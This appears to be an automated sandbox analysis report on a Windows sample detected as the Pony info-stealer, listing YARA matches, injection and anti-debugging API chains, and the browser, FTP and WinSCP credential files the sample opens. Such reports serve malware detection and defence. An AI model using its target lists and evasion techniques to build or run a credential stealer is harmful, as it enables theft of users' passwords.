Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: a5gvJhukP7.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@0/1
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D1E9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 1_2_004027AF
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, 1_2_00402B2A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_0040A6AF
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1950 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,LoadLibraryExA,GetProcAddress,ExitProcess, 0_2_00BA1950
Source: a5gvJhukP7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: a5gvJhukP7.exe, 00000001.00000003.1710942974.00000000011F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: a5gvJhukP7.exe ReversingLabs: Detection: 89%
Source: unknown Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe" Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: msi.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: a5gvJhukP7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected aPLib compressed binary
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BA433B
PE file contains an invalid checksum
Source: a5gvJhukP7.exe Static PE information: real checksum: 0xf6c6 should be: 0x3001d
PE file contains sections with non-standard names
Source: a5gvJhukP7.exe Static PE information: section name: .zdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA3775 push ecx; ret 0_2_00BA3788
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA3775 push ecx; ret 1_2_00BA3788
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree, 0_2_00BA1300
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040879B
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_0040443E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BA229A
Contains functionality to check if a debugger is running (RtlQueryProcessDebugInformation/HeapInformation)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1E10 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,RtlCreateQueryDebugBuffer,GetCurrentProcessId,RtlQueryProcessDebugInformation,OutputDebugStringA,Sleep,RtlDestroyQueryDebugBuffer, 0_2_00BA1E10
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BA433B
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1000 mov eax, dword ptr fs:[00000030h] 0_2_00BA1000
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040F731 mov eax, dword ptr fs:[00000030h] 1_2_0040F731
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1000 mov eax, dword ptr fs:[00000030h] 1_2_00BA1000
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BA229A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf, 1_2_004102E0
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00BA229A

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree, 0_2_00BA1300
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Memory written: C:\Users\user\Desktop\a5gvJhukP7.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle, 1_2_00410042
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe" Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00404313
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_0040443E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA391F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00BA391F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0041022F OleInitialize,GetUserNameA, 1_2_0041022F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1C70 GetVersionExA, 0_2_00BA1C70

Stealing of Sensitive Information
barindex
Yara detected Pony
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\Frigate3\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTP Explorer\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SiteDesigner\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\TurboFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\BlazeFtp\ Jump to behavior
